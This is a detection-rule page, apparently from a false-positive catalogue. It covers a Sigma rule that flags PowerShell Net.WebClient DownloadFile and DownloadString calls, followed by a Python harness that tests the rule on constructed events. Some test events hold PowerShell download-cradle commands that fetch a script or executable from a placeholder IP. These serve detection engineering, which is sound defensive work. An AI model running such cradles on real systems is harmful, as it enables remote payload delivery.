LoFP / This activity may be used by legitimate software, such as patch management tools or software updaters. Investigate any such activity and apply the necessary filter.

Techniques

Sample rules

PowerShell Download Via Net.WebClient - PowerShell Classic

Description

Detects PowerShell download activity via the .DownloadFile() or .DownloadString() methods of the Net.WebClient class. This technique is often abused by attackers to download additional payloads.

Detection logic

condition: all of selection_*
selection_download:
  Data|contains:
  - .DownloadFile(
  - .DownloadString(
selection_webclient:
  Data|contains: Net.WebClient
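As an added illustration (not part of the LoFP page or the rule itself), the following Python evaluates the two selections above with Sigma's semantics over constructed PowerShell Classic events, and shows where a tuning filter for the patch-management false positive described at the top would sit. The event text and the ExamplePatchTool path are constructed placeholders.

```python
"""Run the sample rule's logic over constructed PowerShell Classic events."""
from typing import Dict, Iterable, List

# Selections transcribed from the rule. Sigma semantics: a list under a field
# is OR, fields within one selection are ANDed, 'all of selection_*' ANDs the
# selections together, and string matching is case-insensitive.
RULE_SELECTIONS: Dict[str, Dict[str, List[str]]] = {
    "selection_download": {"Data|contains": [".DownloadFile(", ".DownloadString("]},
    "selection_webclient": {"Data|contains": ["Net.WebClient"]},
}

# Hypothetical tuning filter for the false positive named on this page. The
# vendor path is a constructed placeholder, not a real product.
UPDATER_FILTER = {"Data|contains": ["C:\\Program Files\\ExamplePatchTool\\"]}


def field_matches(event: Dict[str, str], spec: str, needles: List[str]) -> bool:
    field, _, modifier = spec.partition("|")
    value = str(event.get(field, "")).lower()
    if modifier == "contains":
        return any(n.lower() in value for n in needles)
    raise ValueError(f"unsupported modifier: {modifier!r}")


def selection_matches(event: Dict[str, str], selection: Dict[str, List[str]]) -> bool:
    return all(field_matches(event, spec, needles) for spec, needles in selection.items())


def rule_matches(event: Dict[str, str], exclusions: Iterable[Dict] = ()) -> bool:
    # condition: all of selection_*  (and not any tuning filter supplied by the analyst)
    if any(selection_matches(event, ex) for ex in exclusions):
        return False
    return all(selection_matches(event, s) for s in RULE_SELECTIONS.values())


# Constructed 'Data' payloads shaped like PowerShell Classic (EID 400/600) events.
EVENTS = {
    "payload_download": {"Data": "HostApplication=powershell -nop -c (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    "file_download": {"Data": "HostApplication=powershell (New-Object System.Net.WebClient).DownloadFile('http://203.0.113.5/x','C:\\t.exe')"},
    "webclient_only": {"Data": "HostApplication=powershell $w = New-Object Net.WebClient; $w.Headers"},
    "invoke_webrequest": {"Data": "HostApplication=powershell Invoke-WebRequest http://203.0.113.5/a"},
    "patch_tool": {"Data": "HostApplication=C:\\Program Files\\ExamplePatchTool\\update.ps1 (New-Object Net.WebClient).DownloadFile('http://updates.example/p.msi','p.msi')"},
}


def alerting_events(exclusions: Iterable[Dict] = ()) -> List[str]:
    return [name for name, ev in EVENTS.items() if rule_matches(ev, exclusions)]


if __name__ == "__main__":
    print("raw rule:", alerting_events())
    print("with updater filter:", alerting_events([UPDATER_FILTER]))
```

Note that the webclient_only and invoke_webrequest events do not alert because both selections must match, which is what keeps the rule narrower than a bare Net.WebClient search.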